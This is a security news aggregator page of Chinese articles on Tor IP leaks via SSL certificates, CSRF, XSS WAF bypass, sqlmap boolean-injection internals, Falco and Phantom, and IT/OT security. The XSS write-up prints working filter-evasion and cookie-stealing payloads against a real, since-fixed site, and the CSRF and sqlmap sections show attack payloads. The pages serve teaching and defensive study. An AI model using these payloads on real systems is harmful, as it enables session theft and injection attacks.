Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

ToR服务中的公共IP是如何通过SSL证书暴露的

$
0
0

安全研究人员发现,许多使用 SSL 证书的 Tor 站点可能会因配置错误暴露真实服务器的公共 IP 地址。研究人员指出,托管隐藏服务的服务器在配置正确的情况下仅监听本机地址(127.0.0.1)。但是如果让 Apache 服务器或 Nginx 服务器监听0.0.0.0,就意味着服务器可绕过 Tor 直接与外部建立连接,这样一来,这些配置错误的服务器的真实IP就容易被发现。

Tor (洋葱路由器)匿名网络是一个由位于世界各地的志愿者维护的各自的匿名网络组成的大型分布式匿名网络,类似于分布式的 VPN,但它是免费,开放的,而且其规模之大超乎想象。

Tor是一个世界范围的计算机网络,在请求开始点以加密方式转发请求,直到到达网络中最后一台称为出口节点(exit node)的计算机。出口节点会对请求进行解密并传输到目标服务器。出口节点是专门用于流量离开Tor网络的最后一跳,也是用于返回流量的第一跳。使用Tor时,与你通信的系统将所有传入的流量视为来自出口节点。他们不知道你的位置,也不知道你的真实IP地址。此外,Tor网络中其他系统也不能确定你的位置,因为实质上只是转发流量,并不知道流量的实际来源。请求的响应将返回系统,但对于Tor网络而言,流量源仅充当了路径中的一跳。本质上,你是匿名的。Tor用户可以避免将他们的IP地址暴露给他们访问的服务器。相反,这些服务器只能看到Tor的一个退出节点的IP地址。但是,TOR不仅会在访问Google.com或Facebook.com等网站时保护其用户,对于希望保持匿名的用户来说,Tor网络上的另一个选项是Tor隐藏服务。


ToR服务中的公共IP是如何通过SSL证书暴露的

Tor的隐藏服务,只能通过Tor技术实现,你可以通过使用.onion扩展来识别它们。与通用的技术相反,这些网站不仅用于暗网活动,也用于正常的使用。事实上,你每天使用的许多网站也可以使用类似的隐藏服务进行访问,以便为重视匿名的用户提供服务。例如,你可以通过https://www.nytimes3xbfgragh.onion或Facebook通过https://facebookcorewwwi.onion访问纽约时报,只要你当前正在使用Tor。

对于网站管理者而言,Tor的另一个优势就是你的用户无法找到服务器的真实IP。这是隐私保障的一大进步,使得审查或删除隐藏的服务变得很困难。为了运行这样的服务,除了调整Tor的一系列设置外,还需要在你托管网站的机器上设置像Apache或Nginx这样的Web服务器。

由于Tor设置中的配置错误,我们本文讨论的漏洞将允许任何人找出隐藏服务的真实IP。

Tor上SSL设置的常见错误

所以如果你使用Tor,那么你显然需要在互联网上保持匿名。假设你用的是TLS/SSL来支持Tor服务。那你必须获得由证书颁发机构签名的.onion扩展名的网站证书。现在,我们假设你的服务URL是examplei.onion。当有人请求网站时,服务器在给予ClientHello请求的ServerHello响应中发送加密数据和证书。证书中的公共名称(CN)区域将声明你的域名,例如www.i.onion。

假设你使用的是Web服务器服务,例如Apache,Nginx或类似的东西,可是由于你错误配置它以监听到达网络接口的所有连接(0.0.0.0),而不是环回地址(127.0.0.1)。这将对你的Web服务器的匿名性造成灾难性影响。

暴露你正在使用的Tor服务的公共IP

任何试图从服务器的公共非Tor IP地址到达端口443的人都将看到CN中找到的证书和.onion域,该域位于给予ClientHello消息的ServerHello响应中。

你可能想知道当你使用Tor时,人们如何能够找到你的公共IP。

如果我假设攻击者可以利用此方法来获取你的个人数据,具体要分几步?

1.攻击者通过端口443向IP范围(例如75.30.203.1-75.30.203.254)发送连接请求;

2.发送ClientHello消息;

3.提取ServerHello消息中的CN;

4.将IP与.onon域相匹配;

重复这4个步骤,攻击者能够使用Tor网络访问许多网站的数据。

总结

根据Rosselyn Barroyeta最近的研究,即使使用最安全的服务,错误配置也会让你暴露。因此你要确保密切关注新的攻击形式。


黑客常用的CSRF跨站攻击与防范-实例讲解

$
0
0

CSRF(Cross-site request forgery),是中文:跨站请求伪造的缩写,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。

CSRF出现的时间已经很久远了,但危害到现在还是十分的常见。这种攻击方式在2000年左右国外就已经发现了,国内互联网起步较晚,到06年才开始被关注。到底这个攻击方式有多普遍呢?YouTube跟百度都被爆出来过。


黑客常用的CSRF跨站攻击与防范-实例讲解
到底什么是CSRF跨站攻击呢?

有些人可能XSS跟CSRF经常分不清,我们先来对比一下XSS跟CSRF的区别:

XSS:攻击者发现XSS漏洞――构造代码――发送给受害人――受害人打开――攻击者获取受害人的cookie――完成攻击 CSRF:攻击者发现CSRF漏洞――构造代码――发送给受害人――受害人打开――受害人执行代码――完成攻击

我们可以看出CSRF比XSS的利用更高级,直接可以略过获取cookie的步骤,也就是说,攻击者自己压根就不需要参与,受害人自己造成的这种局面。就好比攻击者将汽油倒在受害者的门口,受害者自己扔了烟头引起的火灾,很难被发觉是谁攻击的。

这里我们简单举个例子:


黑客常用的CSRF跨站攻击与防范-实例讲解

从上图不难发现,一次CSRF攻击要完成5步:

登录合法网站 合法网站通过验证,受害者储存合法网站的cookie 在不登出的情况下,访问受害者恶意构造的网站B 恶意网站发一个request请求访问A网站 受害者带着A的合法cookie访问了A并执行了恶意操作

以上就是一个大体流程,可能看起来有点生涩,那我们举个例子说明。

我们假设个前提:

账户的余额修改用GET请求money=后面+为充值-为支出,如下:

www.a.com?money=+1000(充值1000)

受害人刚刚访问了自己的余额钱包(合法)并生成了cookie,然后这个时候收到了某人给他发的连接www.b.com,且里面有一张图片,且图片里面存储着恶意代码,如:

<img src="http://www.a.com?money=-1000">

虽然你刚才关闭了钱包的页面,但你点开链接访问这张图片的时候,你的浏览器会解析这句代码,通过你刚才访问合法钱包网站生成的cookie,去再次访问并执行money=-1000,扣除1000的余额。

这里再补充一点,我们都知道通常我们上网,比如登录QQ空间,直接点关闭后,然后再打开同样是可以继续访问不用输入用户名密码的,之所以可以继续访问就是因为你储存的cookie。


黑客常用的CSRF跨站攻击与防范-实例讲解

以上简单的说了一下GET请求,但实际应用上POST请求也不在少数,这时候我们可以把前台表单的method方式设置为POST,然后继续试验,当后台使用$_REQUEST去获取请求参数的时候,通常也会被干掉,因为:

$_REQUEST既可以获取GET请求的数据,也可以获取POST请求的数据,这就造成 了在后台处理程序无法区分这到底是GET请求的数据还是POST请求的数据(也就是说你传POST也行传GET也行)

为什么会执行成功?

CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,而且请求中所有的用户验证信息都是存在于 cookie 中,所以黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。

如何防范? 在请求地址中加入token验证:当攻击者带着构造好的信息来的时候,通常不会知道我们构造的token是什么,我们可以通过验证token的真实性,如果为假就返回错误,如果为真就认为是正常用户访问。 在HTTP头中定义属性验证:我们通过XMLHttpRequest 这个类,可以一次性给所有该类请求加上 csrftoken 这个 HTTP 头属性,并把 token 值放入其中。 验证HTTP Referer:根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址,我们的合法地址为www.a.com?money=+1000,这样就可以正常访问,但如果前面的地址变为www.b.com就被识别出来了。

XSS WAF规则探测与绕过

$
0
0

*本文作者:Conan,本文属 CodeSec 原创奖励计划,未经许可禁止转载。

前言

本文 以B站一个有趣的XSS(已修复)为引子(为什么说有趣后面再解释),作为实例分析其WAF的规则,方便大家加深对XSS WAF探测以及针对性bypass的理解。

进入主题

一、一般waf是由多条正则配合使用,因而绕过也必须根据实际情况构造xss探针 '`";><aaa bbb=ccc>ddd<aaa/> 的方式逐步理清waf规则,对于没被wa的再在chrome浏览器的element和source看xss探针的解析,慢慢耐心尝试即可。

二、个人对于waf bypass的理解:本来应当被wa会生效的payload不在规则库里或用本来就不会生效的payload(这时候是大概率能通过waf的)经过服务器处理后payload最后生效了。

三、过程

1.首先是7师傅给了一个链接,让我们绕一绕b站的waf,callback参数存在xss。
XSS WAF规则探测与绕过

2.上xss探针: ';`"><aaa bbb=ccc>ddd<aaa/>


XSS WAF规则探测与绕过
可以看到探针成功被解析为标签和属性。

3. 上经典payload(这里由于可以控制标签,优先使用 <img><script> ):

对于 <img src=x onerror=alert(1)>


XSS WAF规则探测与绕过
对于 <script>alert(1)<script>
XSS WAF规则探测与绕过
可以看到均被waf拦截了。

4. 分析waf规则:基于从局部到整体的思想(这里是可以写成一个自动化的waf规则探测脚本的,xsstrike有简单的waf探测规则)

这里是xsstrike的简单探测截图:


XSS WAF规则探测与绕过
于是可以率先得到一条waf规则: <script\s+[^>]*src=.* (注意实际的正则可能特别复杂,这里是简化版的,没有考虑一些特殊字符,比如字母和数字可能可以互换,还有一些特殊字符,空格等等,这里能大致描述清楚waf的正则表达式的主要结构就可以了,下面出现的正则表达式同理)。
XSS WAF规则探测与绕过

验证一下确实如此:


XSS WAF规则探测与绕过
5.开始我们的手工waf规则分析

(1) 局部探测

<img> 会wa么,没有wa:


XSS WAF规则探测与绕过

alert(1)会wa么,没有wa:


XSS WAF规则探测与绕过

单独的onerror会wa么,没有:


XSS WAF规则探测与绕过
src=x会wa么,没有wa:
XSS WAF规则探测与绕过
因此是某部分组合起来了才导致被wa了,单独的并没有。

(2) 尝试逐步组合

<img src=x> 会wa么,没有wa:


XSS WAF规则探测与绕过
<img src=x onerror=xxxx> 会wa么,没有wa:
XSS WAF规则探测与绕过
<img src=x onerror=alert(> 会wa么,没有wa:
XSS WAF规则探测与绕过

<img src=x onerror=alert(xxxx> 会wa么,终于wa了哈哈:


XSS WAF规则探测与绕过

(3) 回溯waf规则, <img src=x onerror=aaa(bbb> 会wa么,不wa:


XSS WAF规则探测与绕过
这里我们就可以得知aaa处存在黑名单校验,alert在黑名单里,试试prompt/confirm呢:
XSS WAF规则探测与绕过
均被wa了,单独提取出 onerror=alert(xxxx 呢,竟然不会:
XSS WAF规则探测与绕过
再试试 onerror=alert(xxxx) ,终于wa了:
XSS WAF规则探测与绕过
这里就要分析为什么 <img src=x onerror=alert(xxxx> 会wa,但 onerror=alert(xxxx 不会,只有补全了右括号才会的原因,我的猜测是前者触发了另一条waf规则(针对标签开头的waf规则 <[^>]*\s+on\w+=(?:prompt|alert|confirm){1}\(\w+ ,用 <..aaaa onbbbb=alert(ccc 成功触发waf(注意这里用\w的原因是比较懒,经过测试数字型on1111并不会被wa,描述清结构即可=。=)
XSS WAF规则探测与绕过
XSS WAF规则探测与绕过
而后者对应的waf规则直接是 on\w+=(?:prompt|alert|confirm){1}\(\w+\) 。

到这里我们明白我们的payload被wa的原因是触发了下列这两条(同时触发或者触发其中一条都会wa)。

on\w+=(?:prompt|alert|confirm){1}\(\w+\) <[^>]*\s+on\w+=(?:prompt|alert|confirm){1}\(\w+

分析第一条规则和第二条规则,最主要的是对弹框函数的过滤,因此使用黑名单之外的函数可能bypass,测试发现console.log可以绕过:


XSS WAF规则探测与绕过
但这里要求是弹框,对于函数的黑名单我们想到了可以用top对象绕过 top['alert'](1) 或者 top['al'+'ert'](1) 由于 [] 的存在不匹配字母数字或者下划线( \w )导致 <img src=x onerror=top['alert'](1)> 不匹配正则表达式也就不会被wa。
XSS WAF规则探测与绕过
XSS WAF规则探测与绕过
(4)对于7师傅的解法的分析:

a. 使用script标签利用响应包会拼接双写payload绕过(基于特殊情景构造不在waf规则里的无效payload,经过组合后又生效了,也就是上文之前对于bypass的第二种理解)

利用 </script><script> + </script></script> 拼接闭合中间的 <script>标签 ,然后浏览器解析的时候为我们补上了最后的 </script>

payload向量结构: aaa</script>bbb<script>ccc


XSS WAF规则探测与绕过

可以看到最后aaa和ccc都是在 <script> 标签里了,并且aaa换成函数名+括号可以绕过了正则 <script>.*\(.*\) ,将a替换为 alert(document.cookie) ,将c替换为任意一个不被wa的变量或内置函数对象名即可 console.log

payload: alert(document.cookie)</script>bbb<script>console.log


XSS WAF规则探测与绕过
XSS WAF规则探测与绕过

b.7师傅的解法巧妙利用了前后双写拼接闭合中间的方式绕过 <script> 后的绝大部分正则检测,但对于正则的描述还不够具体, <script>aaa(bbb) 并不会被wa


XSS WAF规则探测与绕过
因此联想到 <script>alert(1)</script> 被wa还是因为函数的原因,所以正则应该是 <script>.*\s(?:alert|prompt|confirm)\(.*\) ,因此简单的做法还是直接利用top对象绕过即可,payloads: <script>top['alert'](1)</script>
XSS WAF规则探测与绕过

(5) 到这里发现了什么吗?

前面的截图中有的是弹1有的是弹document.cookie,因为7师傅的解法可以弹document.cookie,而其他两种解法的document.cookie被wa了,也就是说我们触发了某些waf规则了。

a.<script>top['alert'](document.cookie)</script>被wa

对比 <script>aaa(document.cookie) 和 <bbb>aaa(document.cookie)


XSS WAF规则探测与绕过
可以发现与 <script> 有关,经测试 <script>document.cookie 和 <script>doucment['cookie'] 均wa,再缩小,发现 <script>document[xxx] 和 <script>document.xxx 也wa了,但是 <script>documentxxx 不wa,于是乎可以判断又有两个waf规则很显然,即 <script>.*\s?document\.\w+ 和 <script>.*\s?document\[\w+\] 再对比 <script>aaa[](document.cookie) 与 <script>aaa[bbb](document.cookie)
XSS WAF规则探测与绕过
可以发现后者被wa了,此时想到用反引号代替括号,但反引号内的 document.cookie 并不会被解析为对象,确实绕过了规则但并没有实现弹cookie,
XSS WAF规则探测与绕过
到这里基本可以归纳补充加入反引号的规则的逃逸为 <script>[^`]*document\.\w+ 和 <script>[^`]*document\[\w+\]

缩小的过程的还发现 <script>\w+\.cookie 也会wa,到这里我就不想弹cookie了,打扰了。

尝试加载远程src,发现 <script\s(.*\s)?src(=\w+)?> 也wa了,到这里基本放弃对 <script> 后的规则的bypass了,打扰了。

b. <img src=x onerror=top['alert'](document.cookie)>

经过a的分析,对于标签内的document.cookie的规则我觉得也是凶多吉少,这里不再尝试

c. 尝试了下a标签,发现 <a href=javascript:xxx 就会被wa,但是 <a href=ccc> 和 <a yyy=javascript:xxx> 和

Container security orchestration with Falco and Splunk Phantom

$
0
0

Container security orchestration allows to define within your security policy how you are going to respond to your different container security incidents. These responses can be automated in what is called security playbooks. This way, you can define and orchestrate multiple workflows involving different software both for sourcing and responding. This is how Falco and Splunk Phantom can be integrated together to do this.

What is Splunk Phantom?

Phantom is a security orchestration platform, part of Splunk product portfolio. Phantom collects security events and reports from different sources, providing a unified security operations engine on top of them. With Phantom, you can automate tasks through security playbooks, orchestrate workflows and support a broad range of SOC (Security Operations Center) functions including events, case management, collaboration and reporting.

Imagine that to implement security on your Kubernetes cluster you have network perimeter security from your cloud provider, image scanning from a few different places because your use multiple registries, host OS software updates notifications and IDS container runtime security monitor like Falco. With Phantom, you can unify the events coming from these four sources and create your own “security control center” with aggregated reporting and unified incident response workflows.

#Container #security orchestration with @sysdig #Falco and @splunk #Phantom

Click to tweet

How integrate Falco and Phantom for container security orchestration?

Falco does an awesome job detecting anomalous runtime activity in your container fleet . For example: someone executing an interactive shell in a container; a container spawning suspicious process like a webshell, a rootkit or a cryptominer, an unexpected network connection, like a new outgoing connection from a database; or an application reading credentials files long after was started or writing files where it shouldn’t.

But Falco just emits security events, and you need to send those somewhere else for processing, alerting, maybe triggering some kind of incident response reaction and in the long term auditing, reporting and storage. Phantom is great at doing these, so publishing Falco events into Phantom made a lot of sense.Falco adds value to Phantom providing container and Kubernetes security insights. Phantom allows Falco to trigger incident response workflows for container security orchestration, store and report on the container security events .

In order to integrate Falco and Phantom together for container security orchestration, we will be using our Kubernetes response engine to publish Falco events into NATS message broker. Then a Function as a Service will be executed through Kubeless, which is subscribed to the message broker topics. This FaaS will format and forward our Falco container security events into Splunk Phantom:


Container security orchestration with Falco and Splunk Phantom

So let’s deploy this setup in our Kubernetes cluster. First, make sure kubectl is pointing to the desired Kubernetes cluster and then execute:

$ git clone https://github.com/draios/falco.git $ cd integrations/kubernetes-response-engine/deployment/cncf $ make

In case you don’t have Helm already running on your cluster, make sure you commit tiller’s RBAC configuration and then:

$ helm init --service-account tiller $ helm install --name sysdig-falco --set integrations.natsOutput.enabled=true stable/falco

After a couple of minutes (don’t worry if the pods restart a few times before entering Running state, there are some dependencies between them), you should have all the mentioned components up and running:

default sysdig-falco-frgp9 2/2 Running 1 33s default sysdig-falco-snjq7 2/2 Running 1 31s kubeless kubeless-controller-manager-d6db997c-c8gg9 1/1 Running 0 2m kubeless nats-trigger-controller-5c6659cb6f-4g2nq 1/1 Running 0 2m nats-io nats-1 1/1 Running 0 2m nats-io nats-2 1/1 Running 0 2m nats-io nats-3 1/1 Running 0 1m nats-io nats-operator-847684f6c7-mgmtt 1/1 Running 0 4m

Now that we have the Kubernetes response engine, we need to deploy Phantom. If you don’t have a Phantom commercial licence, you can get a free trial registering here . Once you register and log in, you will be able to download an OVA virtual machine image.

We need this VM instance to be reachable from your Kubernetes cluster. Different options here: you can run the image locally and then set up NAT forwarders or upload the VM to AWS a assign it a public IP address.

With both sides up and running, you can next deploy the Kubeless function that will forward events to Phantom.

Make sure you have pipenv and kubeless installed in your environment as described in Deploying Kubernetes Response Engine Components: NATS and Kubeless framework and then go to the Falco repository you cloned earlier:

$ cd falco/integrations/kubernetes-response-engine/playbooks/ $ ./deploy_playbook -p phantom -e PHANTOM_USER=$SOMEUSER -e PHANTOM_PASSWORD=$SOMEPASSWORD -e PHANTOM_BASE_URL=$PHANTOM_URL -t "falco.*.*"

PHANTOM_USER= and PHANTOM_PASSWORD= will be the credentials required to login into Phantom. PHANTOM_BASE_URL= will be the endpoint where Phantom is reachable.

Also you would have to add -e VERIFY_SSL=False if your Phantom instance doesn’t have a valid SSL certificate.

The function will take a couple of minutes to be ready, you can check it’s current state with:

$ kubeless function ls NAME NAMESPACE HANDLER RUNTIME DEPENDENCIES STATUS falco-phantom default phantom.handler python3.6 cachetools==2.1.0 1/1 READY

Once ready, Falco events will automatically show up in the Phantom interface:


Container security orchestration with Falco and Splunk Phantom

Let’s run a simple example, spawning a shell in one of our containers, something that Falco detects by default:

$ kubectl exec -it sysdig-falco-frgp9 bash Here we will immediately receive a new event Terminal shell in container together with all the metadata like specific pod and command that was used, visualized in a timeline. From here we can assign the issue to a support person, trigger a mail notif

IT和OT的协同防护已刻不容缓 3点入手

$
0
0

对于IT系统来说,大家比较熟悉,但对于以工业自动化控制系统为代表的OT(操作技术)系统却要相对陌生。实际上近年来针对OT发动的攻击却此起彼伏,如电力、医疗、公共设施等,安全己转向IT和OT协同防护。


IT和OT的协同防护已刻不容缓 3点入手
常被忽视的OT

首先,我们来了解下IT与OT。IT即信息技术,是用于管理和处理信息所采用的各种技术总称,主要是应用计算机科学和通信技术来设计、开发、安装和实施信息系统及应用软件。而OT (Operational Technology),则指操作技术,是工厂内的自动化控制系统操作专员为自动化控制系统提供支持,确保生产正常进行的专业技术。

一般来说,在网络风险面前,IT系统拥有较为健全的安全体系,其防护也备受重视,然而如今生产过程已同信息交互结合的越来越紧密,甚至要呼唤新的运营模式,好让IT和OT进一步深度融合,形成一个贯穿整个制造企业的技术架构。但事实上,面向OT系统的安全威胁却常被忽视。这不仅由于OT中的安全程序和技术应用与IT系统大相径庭,还由于每个垂直行业业务特征存在较多差异。可实际上OT系统面临的问题与IT系统同样严峻。

OT安全怎样搞?

在2018年Verizon数据违规调查报告(DBIR)中,除了金融服务行业外的OT系统违规行为(不是事故)高达649个,占该报告违规行为中的29.2%。这意味着虽然并未直接出现安全事故,但这些OT系统中却存在“网络珍珠港”,随时可发生大灾难。

既然之前被忽视了,那从现在开始,对于OT安全就要重视起来,可具体要怎样搞呢?拥有OT系统的企业在应对安全威胁时,可以从下面3点入手。

1. 企业环境都不了解 没法防

如果企业没有花时间来清点其系统并评估给定环境的安全状况,那么这个企业就处于严重的危机中。而一旦管理者不了解其中的基础架构,各平台的连接方式,使用或生成的数据,以及这些数据对业务的影响,那么要想保护其IT/OT环境不受侵扰简直是不可能的。

因此,对于传统的工业化环境来说,一定要先清楚自身的基础架构、系统环境,对各种可能发生的威胁展开预判与监控。这样的话,面对攻击时,企业也能够快速地检测到并及时处置。

2. IT和OT要协同防护

在了解了企业环境后,就要将IT和OT的安全防护协同起来,不仅仅是在架构层面,还要在内部团队、安全厂商等层面上建立协同机制。通过几方协同把防护机制建立起来,把工业主机保护好,确立长期的漏洞攻防机制,IT和OT协同的应急响应处置机制等。

而促使IT和OT协同防护的另一个原因,还有网络边界的日益模糊。比如2017年国家电网公司的互联网边界就曾遭受不同程度的网络攻击,攻击数量同比增长将近50%,在2018年上半年该数字则同比翻了一倍。在这种严峻的态势下,如果将IT和OT防护割裂开,显然是不切实际的。

此外,强化安全厂商、工控厂商、系统集成商,甚至监管部门间的无间协作也相当重要。一旦发现安全隐患,或安全厂商收集到OT相关的威胁情报,能够及时将其同步给企业、监管部门形成协同联动,让工业企业可以迅速做出响应,赢得时间。

3. 网络分段不能少

除了建设协同机制,网络分段亦不能少。这是由于许多OT系统部署在扁平网络拓扑内,而在不应该产生交互的系统之间没有任何分段,为蓄意攻击提供了跳板。那么具体该如何做呢?

在评估网络拓扑和数据流之后,开发出网络分段策略就很必要了。这些策略类似于描述控制访问的区域和管道的各种行业标准语言。而这些策略的目标则是减轻与异常网络流量相关的漏洞或问题的潜在损害。当然,完全的隔离无法实现,但只要连接,尽量仅在IT、OT系统间传递所需的必要流量,并且应该强制执行各个区域之间的通信路径限制等手段进行安全监管。

结语

随着5G临近,万物互联时代即将开启,网络的边界更加模糊,如何确保涉及国计民生的OT系统安全,显然不能将其孤立考虑。这时,IT和OT的协同防护无疑更为靠谱。此外,建设必要的威胁态势感知系统,通过应用人工智能和大数据技术,实现安全数据、环境数据、情报数据的关联分析,实现对威胁的快速识别与有效处置,最终达到攻击事件过程可追溯,攻击链路可揭示,让攻击者无所遁形的目的。

Sqlmap如何检测Boolean型注入

$
0
0

Sqlmap如何检测Boolean型注入
0x00 前言

一次使用sqlmap过程中,它无法检测出一个很明显的布尔型回显注入,很好奇sqlmap如何检测不出。再加上有写检测注入工具的想法,看看sqlmap究竟是如何自动判断boolean型注入。

0x01 无法检测boolean注入

这里是存在boolean型注入,sqlmap检测不出来了。


Sqlmap如何检测Boolean型注入

但是当把”33333333”增长一点,sqlmap是提取到”33333333…”作为了关键词来判断哪个页面正确哪个页面错误。


Sqlmap如何检测Boolean型注入

那sqlmap是如何提取的呢?

0x02 分析

sqlmap之所以能成为神器,因为它考虑了很多,代码也就很多,但是我对其他的技术细comparison节不太感兴趣,所以只针对如何检测boolean进行详细追溯。开始分析的时候,看代码的时候是根据关键词往上溯,这里是从上往下看。

通过上图,通过sqlmap显示的info,找到关键词 with --string= ,来到 sqlmap-masterlibcontrollerchecks.py ,再寻找if、while之类的看下代码的流程,来到 478行


Sqlmap如何检测Boolean型注入

从注释可以看到,这里是boolean型检测开始,下面还有其他的error-based、time-based、UNION query。明白自己所在的位置,大概分析的范围。


Sqlmap如何检测Boolean型注入

genCmpPayload 这个函数用于生成boolean类型payload,

kb.matchRatio 是原始页面和 id=原始值 + "),'.)(((, 报错页面的相似度。

kb.negativeLogic 是负逻辑,用一个负的随机数然后添加or的payload,where其他值可以在 sqlmap-masterxmlpayloadsboolean_blind.xml 看到具体含义。


Sqlmap如何检测Boolean型注入

接下来是 queryPage 函数,这个函数比较重要,它有一个修饰器,在 sqlmap-masterlibcoredecorators.py 中,threadData比较重要,它存储着上次请求的请求的各种数据,用来进行对比数据。在这个修饰的作用是为了当函数调用失败的时候,如果函数增加了往threadData.valueStack增加了数据,可以进行删除,从而恢复原来未调用函数之前的状态。下面是threadData存储的内容。


Sqlmap如何检测Boolean型注入

queryPage 还会根据参数值,返回不同的结果,比较关键的是 getRatioValue 参数,因为这个参数的bool值影响里面最为关键函数comparison返回值。

comparison 函数,也是根据getRatioValue参数,返回不同的结果,当getRatioValue为True的时候,返回与原始页面的相似度。

为False的时候,返回Bool值:

ratio > UPPER_RATIO_BOUND(0.98),返回True。
ratio < LOWER_RATIO_BOUND(0.02)为False。
(ratio - kb.matchRatio) > DIFF_TOLERANCE(0.05),允许%0.05的误差。

很多情况下payload会回显在页面上,sqlmap这里是把payload替换成 REFLECTED_VALUE ,然后对比的时候再把这些干扰因素去掉。

再通过threadData给falsePage, truePage返回包的各种参数(用于后面提取特征)。并通过 queryPage 获取相似度。进入到下一步判断。

这里有一个 kb.nullConnection ,通过checkNullConnection函数进行检测,

1、HEAD方法请求,判断返回包里面是否有Content-Length。(近iis6支持)

2、增加Header头Range: bytes=-1,通过len判断返回报body的长度是不是等于1。(这个测试了apache、nginx、Apache-Coyote/1.1都无效)

3、直接通过判断返回报文里面是否有Content-Length,如果有则说明支持skip-read。(仅仅读取Content-Length的长度,来作为判断注入的依据)

当取Content-Length作为判断的时候的相似度计算公式,这里注意一点,这里有一个取倒数

ratio = 1. * len(seqMatcher.a) / len(page)
if ratio > 1:
ratio = 1. / ratio

因为多字节的问题,”路飞”,len(“路飞”)为2,而Content-Length为4。这样会导致ratio大于1。

再看下下面的判断


Sqlmap如何检测Boolean型注入

前面是发送正确的payload返回true,现在拿false的payload发送,测试是否返回false。如果错误页面的相似度也高于0.98则进入提取特征的环节,并不会判定为为注入。如果错误页面低于0.98虽然也会进入获取页面特征环节,但是此时已经被标注成了注入了。

在标记注入前,如果 kb.heavilyDynamic (太多的变量了),还会进行一次使用ture payload判断是否如何规则。然后才把injectable置为true。

函数 getFilteredPageContent 通过正则 <script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|t|n|r 去掉所有的标签和script和css样式代码,通过对比正确的页面和错误页面收集的关键词,减去差集获取特征候选者。

获取到特征候选者还会继续判断是不是仅仅由字符,逗号,句号,感叹,空格构成,里面是否又感叹号,是长度大于10,这样才之后才能成为特征值。


Sqlmap如何检测Boolean型注入
这里主要是用于在判断了可能存在注入,提取一些特征,比如返回状态码、返回字符串。函数 extractTextTagContent 通过正则 <(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>([^<]+) 提取特定标签的text,然后获取正确页面text-错误页面text集合-错误页面的text,得到特征字符串。
Sqlmap如何检测Boolean型注入

提取不返回的字符串,如果没有字符串和状态码这样明显特征,在判定可能存在注入的情况下,就只能靠相似度来识别。


Sqlmap如何检测Boolean型注入

后面判定存在了,做了一些赋值,为后面的注入数据做准备工作。下面还有两个检测过滤工作。


Sqlmap如何检测Boolean型注入

checkSuhosinPatch(injection) ,检查了Suhosin path,因为Suhosin Get类型的,只获取value值前512字节,所以发送超过 512 字节的payload,看是否还存在注入,如果存在,就没有Suhosin path,

payload为:

id=1' and 9703= (512空格) 9703 AND 'DyXn'='DyXn

checkFilteredChars(injection) ,检测大于号和圆括号是否过滤,如果利用下面payload请求返回包的相似度判断是否被过滤。

AND 2210>2209 AND 'mTvV'='mTvV
AND (2209)=2209 AND 'ZWWn'='ZWWn 总结

首先会收集原始页面body内容,用于相似度的比较,然后通过相似度初步判断是不是注入,如果判定为注入还会进行提取特征去作为特征值,如果没有只能使用相似度作为判断。

if re.match(r"A[w.,! ]+Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
injectable = True

最开始说的那个注入之所以没有检测出,就是因为错误页面的相似度高于0.98,虽然提取出特征出来,但是后面判断特征不符合,放弃了该特征,导致判定没有注入。

而这个判断是不太符合国情的,因为我们语言中使用空格的频率并不高,而英语是一个单词一个空格。

参考

https://www.anquanke.com/subject/id/160641

【新科技创业2018】「漏洞银行」研发新一代安全防御生态体系

$
0
0

【新科技创业2018】「漏洞银行」研发新一代安全防御生态体系

受访人:漏洞银行CEO罗清篮

36氪此前报道:《 提供企业安全服务?“漏洞银行”认为众测悬赏和综合诊断要两手抓 》

Q1、2018年 , 公司在技术、产品、市场、商业化、融资、团队等方面取得了哪些进展?

首先是在2018年提出了一种区别于传统安全理念的下一代安全理念,并基于该理念,自主研发出一套以产品和服务为核心的新一代安全防御生态体系,涉及漏洞安全、城域安全、云安全等多个安全细分领域。

其次,投入很大一块精力来协助进行国家级重大会议活动的网络安全保障工作,在2018年先后为上海合作组织峰会、十九大、中国国家进口博览会等提供服务。

Q2、2018年,行业内发生的对所在行业影响最大的三件事?

首先是重点关注由美国率先对中国发动的世界性贸易 战,贸易 战不仅对我们网络安全行业,对几乎所有行业都有非常剧烈的影响,我们会持续关注贸易战的走势情况,随时准备对发展战略进行调整。

第二是近期新设立的上证所科创板,对于我们科创公司来说是一个非常利好的消息。

另外新《网络安全法》正式颁行之后,在2018一整年里我们都在持续关注以及响应后续相关政策的执行和落实。

Q3、2019年,会关注的行业大件事有哪些?

2019年我们会主要关注两件事,一是科创板的实时情况,希望在最合适的时机往前更进一步。

二是关注国家安全战略有哪些重要调整和走向。

Q4、2019年, 自己所在的行业、所在的细分方向大概率会出现的事情和趋势会有哪些?

网络安全领域,因为区块链、AI等新兴技术逐渐成熟和普及,今后非法第三方的攻击行为将会愈发隐秘并且更具威力,而相较于传统的规模性、破坏性攻击,其会将注意力进一步集中在核心数据的攫取和破坏上。

同时不论是攻击端还是防守端,都将更倾向于依靠AI智能技术,因此在接下来一年乃至更之后的时间里,攻防间的对抗会愈发变得激烈。

Q5、2019年,公司所在的行业会呈现出来什么样的竞争格局?

国内的网络安全市场刚刚起步,纵观国内整体的安全市场,以后每一个细分领域都可能出现多家网络安全公司 。未来最重要的竞争力就是数据,谁掌握了大数据,谁就可以攀上安全行业竞争的制高点。

Q6、2019年,公司是否会有一些里程碑节点?

2019年公司会更加注重和政府资源的合作,以及和更多的企业建立联合防线。19年上半年中小企业都有可能出现较大规模的失业潮,所以我们会把更多的精力和资源投向更大的企业或机构进行服务。这里面对我们的服务品质、技术产品会有更大的挑战和要求。

Q7、2019年,公司所在的赛道上的公司,有什么一定要做的事情或者争夺的市场?

19年公司会更重视业务的增长率和转化率,我们会在技术研发上做更多的资源投入。

